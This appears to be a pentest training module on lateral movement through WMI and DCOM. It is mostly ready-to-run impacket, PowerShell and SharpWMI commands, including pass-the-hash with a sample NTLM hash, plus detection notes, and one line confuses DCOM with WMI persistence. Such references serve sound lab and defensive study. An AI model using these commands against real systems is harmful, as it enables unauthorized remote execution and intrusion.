Back to All Modules

WMI and DCOM

#Overview

Windows Management Instrumentation (WMI) and Distributed Component Object Model (DCOM) provide alternative remote execution methods when SMB or WinRM is blocked. WMIExec uses WMI to spawn processes, leaving fewer artifacts than PsExec. DCOM objects (MMC20, ShellWindows, ShellBrowserWindow) enable lateral movement through COM object instantiation on remote systems. Both methods work over RPC ports (135 + high port range).

#Prerequisites

  • Valid credentials or NTLM hash with administrative privileges on the target
  • RPC ports (135 + dynamic range) accessible (may require firewall exceptions)
  • impacket suite (wmiexec.py, dcomexec.py) or PowerShell

#Exploitation / Execution

#1. impacket-wmiexec

Creates a semi-interactive shell via WMI process creation. No service creation, fewer artifacts than PsExec:

# With password
impacket-wmiexec.py <domain>/<user>:'<password>'@<IP>

# With NTLM hash (PTH)
impacket-wmiexec.py <domain>/<user>@<IP> -hashes :<NTLM_hash>
impacket-wmiexec.py -hashes :184fb5e5178480be64824d4cd53b99ee administrator@10.10.10.192
BASH
# impacket-wmiexec shell type and codec flags
impacket-wmiexec 'domain.local/user:pass@target' -shell-type powershell
# -shell-type: cmd (default) | powershell (for cmd.exe restricted environments)
# -codec: Character encoding for international Windows (e.g., -codec utf-8)
BASH

#2. impacket-dcomexec

Uses DCOM objects for remote execution. Multiple DCOM object options provide flexibility when specific objects are blocked:

# Default (MMC20 Application)
impacket-dcomexec.py <domain>/<user>:'<password>'@<IP>

# With hash
impacket-dcomexec.py <domain>/<user>@<IP> -hashes :<NTLM_hash>

# Specify DCOM object
impacket-dcomexec.py <domain>/<user>@<IP> -object MMC20
impacket-dcomexec.py <domain>/<user>@<IP> -object ShellWindows
impacket-dcomexec.py <domain>/<user>@<IP> -object ShellBrowserWindow
BASH

#3. PowerShell WMI (Native, from Windows host)

# Create a remote process via WMI
$cred = Get-Credential
$target = "<IP>"

Invoke-WmiMethod -Class Win32_Process -Name Create -ArgumentList "cmd.exe /c whoami > C:\temp\out.txt" -ComputerName $target -Credential $cred

# Execute with alternate credentials
$wmi = Get-WmiObject -Class Win32_Process -ComputerName $target -Credential $cred
$wmi.Create("powershell.exe -c '...'")

# Using Invoke-CimMethod (newer)
Invoke-CimMethod -ClassName Win32_Process -MethodName Create -Arguments @{CommandLine="cmd.exe /c whoami"} -ComputerName $target
POWERSHELL

#4. WMI for Command Output Retrieval

WMI does not return command output. Use file output and read-back:

# Step 1: Write output to file
Invoke-WmiMethod -Class Win32_Process -Name Create -ArgumentList "cmd.exe /c whoami > C:\Windows\Temp\out.txt" -ComputerName <target> -Credential $cred

# Step 2: Read file
Get-Content \\<target>\C$\Windows\Temp\out.txt               # Via SMB
POWERSHELL

#5. DCOM Lateral Movement with PowerShell

# MMC20.Application DCOM object
$mmc = [Activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.Application", "<target>"))
$mmc.Document.ActiveView.ExecuteShellCommand("cmd.exe", $null, "/c whoami > C:\temp\out.txt", "7")

# ShellWindows DCOM object
$shell = [Activator]::CreateInstance([type]::GetTypeFromCLSID("9BA05972-F6A8-11CF-A442-00A0C90A8F39", "<target>"))
# Navigate to a Windows Explorer window and execute command

# ShellBrowserWindow
$shell = [Activator]::CreateInstance([type]::GetTypeFromCLSID("C08AFD90-F2A1-11D1-8455-00A0C91F3880", "<target>"))
$shell.Document.Application.ShellExecute("cmd.exe", "/c whoami", "C:\Windows\System32", $null, 0)
POWERSHELL

#7. Advanced DCOM Lateral Movement

# MoveLaterally / SharpMove for advanced DCOM exploitation
# DCOM methods: ShellWindows, ShellBrowserWindow, ExcelDDE, MMC20.Application
TEXT

#6. SharpWMI (C# Tool)

.\SharpWMI.exe <target> <domain>\<user> <password> "cmd.exe /c whoami"
POWERSHELL

#When to Use Each Method

MethodBest ForArtifacts
WMIExecGeneral lateral movementProcess: wmiprvse.exe, Event ID 4688
DCOM (MMC20)When WMI is restrictedProcess: mmc.exe spawning child
DCOM (ShellWindows)When MMC20 is blockedProcess: explorer.exe spawning child
DCOM (ShellBrowserWindow)Stealthier alternativeProcess: explorer.exe spawning child
WinRM/PSSessionInteractive shell preferredProcess: wsmprovhost.exe

#Common Pitfalls

  • ⚠️ WMI does not return command output directly -> redirect to file and read via SMB
  • ⚠️ DCOM requires high-port RPC access -> firewalls between network segments may block dynamic ports
  • ⚠️ DCOM objects require specific Windows features enabled -> ShellBrowserWindow requires Explorer running
  • ⚠️ WMI process creation leaves wmiprvse.exe processes that may be monitored

#OPSEC Considerations

  • 🛡️ WMI process creation generates Event ID 4688 with parent process wmiprvse.exe
  • 🛡️ DCOM execution generates Event ID 4688 with parent process svchost.exe (DcomLaunch)
  • 🛡️ WMI activity is logged in Microsoft-Windows-WMI-Activity/Operational log
  • 🛡️ Multiple failed DCOM attempts may trigger COM object access failure logs

#Post-Exploitation Value

  • Remote code execution when SMB/WinRM are filtered
  • Multiple DCOM object fallbacks when one object is unavailable
  • WMI querying can enumerate system state without interactive shell
  • DCOM can be used for persistence via WMI event subscriptions

#Cross-References

#Tool References

ToolLink
impacket (wmiexec, dcomexec)https://github.com/fortra/impacket
SharpWMIhttps://github.com/GhostPack/SharpWMI

#Source Machines

  • Blackfield (Hard, AD) - WMIExec as alternative to PsExec

#Additional Notes

  • WmiPrvSE.exe is the WMI Provider Host process that executes on behalf of WMI clients
  • DCOM authentication levels can be configured per-application and may block certain methods
  • Some DCOM objects require an interactive window station (session 0 or user sessions)